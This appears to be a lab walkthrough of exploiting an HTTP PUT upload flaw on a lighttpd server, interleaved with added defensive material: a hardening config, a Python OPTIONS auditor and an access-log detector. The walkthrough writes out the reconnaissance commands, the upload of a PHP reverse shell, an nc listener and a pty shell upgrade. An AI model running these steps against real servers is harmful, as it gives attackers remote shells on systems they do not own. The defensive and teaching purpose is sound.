Principle of the PUT upload vulnerability
Common middleware such as Apache, Tomcat, IIS and WebLogic (strictly speaking, web containers) can be configured to support various HTTP methods. Each HTTP method has its own function; among them, PUT uploads a file from the client directly to the server. If the middleware has the HTTP PUT method enabled, a malicious attacker can upload a webshell straight to the server.
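As an added illustration that is not part of the original article: one common way PUT ends up enabled on lighttpd (the server the walkthrough below identifies) is mod_webdav with read-only switched off and no authentication in front of it. The article does not say how the target was actually configured, so this is an assumption; the directive names are lighttpd's own, and the weak setting is shown beside the corrected one.

```conf
# Weak: mod_webdav active on /test, read-only off, no authentication.
# Any client can PUT, DELETE, MOVE or COPY files under /test, including .php files.
server.modules += ( "mod_webdav" )

$HTTP["url"] =~ "^/test/" {
    webdav.activate    = "enable"
    webdav.is-readonly = "disable"    # exposes PUT/DELETE/MKCOL/MOVE/COPY
}

# Corrected: either remove mod_webdav from server.modules entirely, or keep the
# share read-only so only PROPFIND/OPTIONS are served. If write access is genuinely
# needed, require authentication (mod_auth) on this location and make sure the
# upload directory is not one from which the server executes scripts.
$HTTP["url"] =~ "^/test/" {
    webdav.activate    = "enable"
    webdav.is-readonly = "enable"     # PUT and the other write methods are refused
}
```

After changing the configuration, re-run the same OPTIONS check the walkthrough uses against every directory, not only /test, since mod_webdav conditionals are matched per URL.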
Target machine setup
Link: https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A
Extraction code: lsq0
Vulnerability reproduction
- Use netdiscover to find live hosts on the network
netdiscover -i eth0
- Use nmap to detect the services and other information on the target machine
nmap -sV 192.168.75.158
- Found that the target runs the lighttpd middleware
- Use dirb to conduct further information mining on the website
dirb http://192.168.75.158
- Found a directory named test
- Browse to this directory and find that it contains no useful information
- Use OWASP ZAP to scan the test directory and find that it has a PUT vulnerability
- Then use the curl command to send a request and check this vulnerability manually
- Note: even if the scanner cannot see the vulnerability in a real engagement, we must still think of testing for it ourselves
curl -v -X OPTIONS http://192.168.75.158/test
The response shows that PUT is allowed, which preliminarily confirms that a PUT upload vulnerability exists
- So we can upload a webshell to this directory
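As an added example (not part of the original write-up), here is a small Python checker for the kind of response the curl OPTIONS command above returns. The two raw responses are constructed for illustration, no host is contacted, and the Server value is a placeholder. It parses the status line and headers, joins a repeated Allow header, and reports which write-capable methods are exposed; this is the check a defender runs across every directory of a server before and after hardening.

```python
# Added example: audit an HTTP OPTIONS response for exposed write methods.
# The raw responses below are constructed samples, not captures from the target.

# Methods that let a client change content on the server. Any of these reachable
# without authentication on a web-accessible directory is a finding.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed: what a WebDAV-enabled directory with read-only switched off answers.
PERMISSIVE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "DAV: 1,2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK\r\n"
    "Allow: GET, HEAD, OPTIONS\r\n"
    "Content-Length: 0\r\n"
    "Server: lighttpd\r\n"
    "\r\n"
)

# Constructed: the same directory after hardening.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET, HEAD, OPTIONS\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_response_head(raw):
    """Split a raw HTTP response into (status_code, headers).

    Header names are lower-cased; a header that appears more than once
    (Allow often does) is joined with commas, as RFC 7230 permits for
    list-valued fields.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate junk lines rather than abort the audit
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = headers[name] + ", " + value if name in headers else value
    return int(parts[1]), headers


def audit_options(raw):
    """Return what the OPTIONS response exposes and whether it is a finding."""
    status, headers = parse_response_head(raw)
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    writable = sorted(allowed & WRITE_METHODS)
    return {
        "status": status,
        "allowed": sorted(allowed),
        "writable": writable,
        "webdav": "dav" in headers,  # a DAV header means mod_webdav or similar is active
        "finding": bool(writable),
    }


if __name__ == "__main__":
    for label, raw in (("permissive", PERMISSIVE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_options(raw))
```

Feed it the output of `curl -i -X OPTIONS` (the `-i` keeps the headers) for each directory and treat any non-empty `writable` list on an unauthenticated path as a finding; an empty `Allow` header is not proof of safety, since some servers omit it, so a direct PUT of a harmless text file to a test path is still the conclusive check.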
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php
- Edit the content of shell.php; I set the port to listen on to 443 here
- Use the Poster plug-in of Firefox to upload the webshell; only the old version of Firefox has the Poster plug-in
- Fill in the URL http://target machine address/test/ followed by the file name to save as; here it is rshell.php
- Select the location of shell.php
- Click PUT to upload
- After the upload succeeds, open a listener on port 443 in Kali
nc -nlvp 443
- Click rshell.php; the reverse connection gives us a shell
- Enter python -c "import pty;pty.spawn('/bin/bash')" to upgrade to a proper interactive terminal
- The system has been successfully penetrated
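From the defender's side, the sequence in this walkthrough (OPTIONS, then a PUT of a .php file, then a GET of that same file from the same client) leaves a distinctive trace in the web server's access log. The following Python example is added here and is not from the original article; the log lines are constructed in the common log layout that Apache and lighttpd write (lighttpd's default format carries the virtual host in the second column, which the regex tolerates), and the client addresses are made up. It flags every write-method request, rates a successful upload of a script extension as high, and raises a separate alert when the same client then fetches the file it uploaded, which is the moment a webshell is executed.

```python
import re
from collections import defaultdict

# Constructed sample access log in the common log layout (Apache/lighttpd);
# these lines are illustrative, not taken from the target machine.
SAMPLE_LOG = """\
192.168.75.1 - - [10/Oct/2020:13:55:30 +0800] "OPTIONS /test HTTP/1.1" 200 0
192.168.75.1 - - [10/Oct/2020:13:55:36 +0800] "PUT /test/rshell.php HTTP/1.1" 201 0
192.168.75.1 - - [10/Oct/2020:13:56:02 +0800] "GET /test/rshell.php HTTP/1.1" 200 0
192.168.75.20 - - [10/Oct/2020:14:01:10 +0800] "GET /index.html HTTP/1.1" 200 512
192.168.75.30 - - [10/Oct/2020:14:03:44 +0800] "PUT /test/notes.txt HTTP/1.1" 405 0
this line is not a log record
"""

# client, two ident/user fields (lighttpd's default puts the vhost in the second),
# timestamp, request line, status. Trailing fields (bytes, referer, agent) are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx", ".cgi", ".pl", ".py")


def parse_line(line):
    """Return the fields of one access-log record, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def scan_access_log(lines):
    """Flag write-method requests and the upload-then-fetch pattern.

    Severity: 'high' for a successful write of a script extension, 'medium' for
    any other successful write, 'low' for a refused write (still worth knowing
    who tried), and 'critical' when the client that uploaded a file then
    requests it.
    """
    alerts = []
    uploaded = defaultdict(set)  # client ip -> paths it wrote successfully
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        base = {"ip": ip, "method": method, "path": path, "status": status, "ts": rec["ts"]}
        if method in WRITE_METHODS:
            ok = 200 <= status < 300
            if ok and path.lower().endswith(SCRIPT_EXT):
                sev = "high"
            elif ok:
                sev = "medium"
            else:
                sev = "low"
            alerts.append(dict(base, kind="write_method", severity=sev))
            if ok:
                uploaded[ip].add(path)
        elif method == "GET" and path in uploaded.get(ip, ()):
            alerts.append(dict(base, kind="upload_then_execute", severity="critical"))
    return alerts


if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_LOG.splitlines()):
        print("%-8s %-20s %s %s -> %d from %s"
              % (a["severity"], a["kind"], a["method"], a["path"], a["status"], a["ip"]))
```

The state kept per client is deliberately minimal (the set of paths it wrote); in a real pipeline it would be keyed over a time window and fed from the log shipper rather than a string, but the two rules, "write method on a script extension" and "fetch of something the same client just wrote", are the ones that would have fired on this target, and a 405 on PUT after hardening is the cheap confirmation that the mitigation is in place.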